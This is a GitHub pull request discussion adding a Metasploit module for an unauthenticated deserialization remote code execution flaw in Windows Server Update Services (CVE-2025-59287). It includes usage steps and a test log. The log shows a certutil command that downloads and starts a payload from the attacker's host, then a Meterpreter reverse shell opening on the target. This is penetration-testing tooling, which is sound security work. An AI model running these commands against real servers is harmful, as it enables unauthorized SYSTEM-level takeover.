Adds module for unauthenticated deserialization in WSUS (CVE-2025-59287) #20674
+278
−0
Conversation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
|
Thanks for your pull request! Before this can be merged, we need the following documentation for your module: |
dledda-r7
reviewed
Nov 6, 2025
dledda-r7
reviewed
Nov 6, 2025
jvoisin
reviewed
Nov 8, 2025
Contributor
jvoisin
left a comment
jvoisin
left a comment
There was a problem hiding this comment.
Wow, that's a very clean module, kudos!
| 'Platform' => 'win', | ||
| 'DefaultOptions' => { | ||
| 'RPORT' => '8530', | ||
| 'WfsDelay' => 900 # need to wait for WSUS to try synchronize |
Contributor
There was a problem hiding this comment.
Why 900 seconds specifically?
Contributor
Author
There was a problem hiding this comment.
No specific reason, wait here can be longer depending on the server - 900 is for debugging purpose.
dledda-r7
reviewed
Nov 10, 2025
dledda-r7
approved these changes
Nov 11, 2025
Contributor
dledda-r7
left a comment
dledda-r7
left a comment
There was a problem hiding this comment.
msf exploit(windows/http/wsus_deserialization_rce) > run
[*] Command to run on remote host: certutil -urlcache -f http://192.168.3.10:8080/SqHMvLtqAZWhX-2lofXn7w %TEMP%\UCvtZRNV.exe & start /B %TEMP%\UCvtZRNV.exe
[*] Fetch handler listening on 192.168.3.10:8080
[*] HTTP server started
[*] Adding resource /SqHMvLtqAZWhX-2lofXn7w
[*] Started reverse TCP handler on 192.168.3.10:4444
[*] Getting server ID
[*] Getting authentication cookie
WARNING: Local file /home/kali/Documents/github/metasploit-framework/data/meterpreter/metsrv.x64.dll is being used
[*] Sending stage (605075 bytes) to 10.5.135.158
[*] Getting reporting cookie
[*] Trying to create malicious event
[*] Created malicious event, now waiting for WSUS to sync
[*] Meterpreter session 1 opened (192.168.3.10:4444 -> 10.5.135.158:50803) at 2025-11-11 10:36:26 -0500
meterpreter > sysinfo
Computer : WIN2022__63DA
OS : Windows Server 2022 (10.0 Build 20348).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 3
Meterpreter : x64/windows
meterpreter >
Contributor
Release NotesAdds a module targeting GHSA-943j-4893-6rfq, an unauthenticated deserialization vulnerability in the Windows Server Update Service (WSUS) resulting in remote code execution as SYSTEM |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
3 participants
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This PR adds RCE module for unauthenticated deserialization in WSUS - CVE-2025-59287.
Work in progress.WSUS provides features for managing and distributing updates through a management console.
The CVE-2025-59287 is a remote code execution vulnerability in
this component that allows an unauthenticated attacker to create a specially crafted event that gets unsafely deserialized upon server sync.
One way to run synchronization is to open the
Windows Server Update Serviceapp,the other is to run the following command from PowerShell:
(Get-WsusServer).GetSubscription().GetLastSynchronizationInfo()Verification Steps
use exploit/windows/http/wsus_deserialization_rceset RHOSTS [target IP]set LHOST [attacker IP]set LPORT [attacker port]runOptions
Scenarios